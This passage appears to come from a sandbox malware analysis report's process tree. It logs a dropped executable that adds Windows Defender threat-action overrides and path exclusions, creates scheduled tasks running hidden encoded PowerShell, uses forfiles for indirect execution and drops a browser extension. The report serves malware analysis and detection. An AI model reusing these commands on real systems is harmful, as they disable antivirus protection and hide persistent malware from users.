                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1604
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:2428
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4704
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4516
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:5044
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:4928
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4288
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:856
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:3040
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4184
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:3844
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:1008
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:5052
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1080
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3904
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4176
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:800
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4784
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4444
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4900
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2356
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4056
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3564
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:4016
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:3560
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1176
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:3388
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:64;"
                                                                    2⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4632
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2808
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3484
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4124
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:32
                                                                      3⤵
                                                                        PID:3736
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1016
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4800
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1356
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4500
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                          PID:208
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:32
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3828
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                            PID:3000
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:4924
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:64
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2572
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                              3⤵
                                                                                PID:4804
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:1780
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2200
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3868
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:1472
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2428
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                      PID:1408
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:64
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3928
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "gdnIcWPPO" /SC once /ST 00:09:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:4504
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn "gdnIcWPPO"
                                                                                    2⤵
                                                                                      PID:856
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "gdnIcWPPO"
                                                                                      2⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:616
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "HUfdpCtBFdwYOuoar" /SC once /ST 00:30:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\ApLDest.exe\" Bn /qRJgdidft 385107 /S" /V1 /F
                                                                                      2⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3344
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "HUfdpCtBFdwYOuoar"
                                                                                      2⤵
                                                                                        PID:5072
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 1044
                                                                                        2⤵
                                                                                        • Program crash
                                                                                        PID:4176
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                      1⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4528
                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                        2⤵
                                                                                          PID:4056
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                        1⤵
                                                                                          PID:2672
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                          1⤵
                                                                                            PID:3984
                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                            gpscript.exe /RefreshSystemParam
                                                                                            1⤵
                                                                                              PID:1796
                                                                                            • C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\ApLDest.exe
                                                                                              C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\ApLDest.exe Bn /qRJgdidft 385107 /S
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops Chrome extension
                                                                                              • Drops file in System32 directory
                                                                                              • Drops file in Program Files directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies data under HKEY_USERS
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4988
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2444
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                  3⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:2356
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                    4⤵
                                                                                                      PID:4528
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3004
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                    3⤵
                                                                                                    • Indirect Command Execution
                                                                                                    PID:1796
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                      4⤵
                                                                                                        PID:4576
                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                          5⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4876
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                      3⤵
                                                                                                      • Indirect Command Execution
                                                                                                      PID:1152
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                        4⤵
                                                                                                          PID:3508
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                            5⤵
                                                                                                              PID:1304
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                          3⤵
                                                                                                          • Indirect Command Execution
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2728
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                            4⤵
                                                                                                              PID:5116
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                5⤵
                                                                                                                  PID:756
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                              3⤵
                                                                                                              • Indirect Command Execution
                                                                                                              PID:908
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                4⤵
                                                                                                                  PID:4992
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                    5⤵
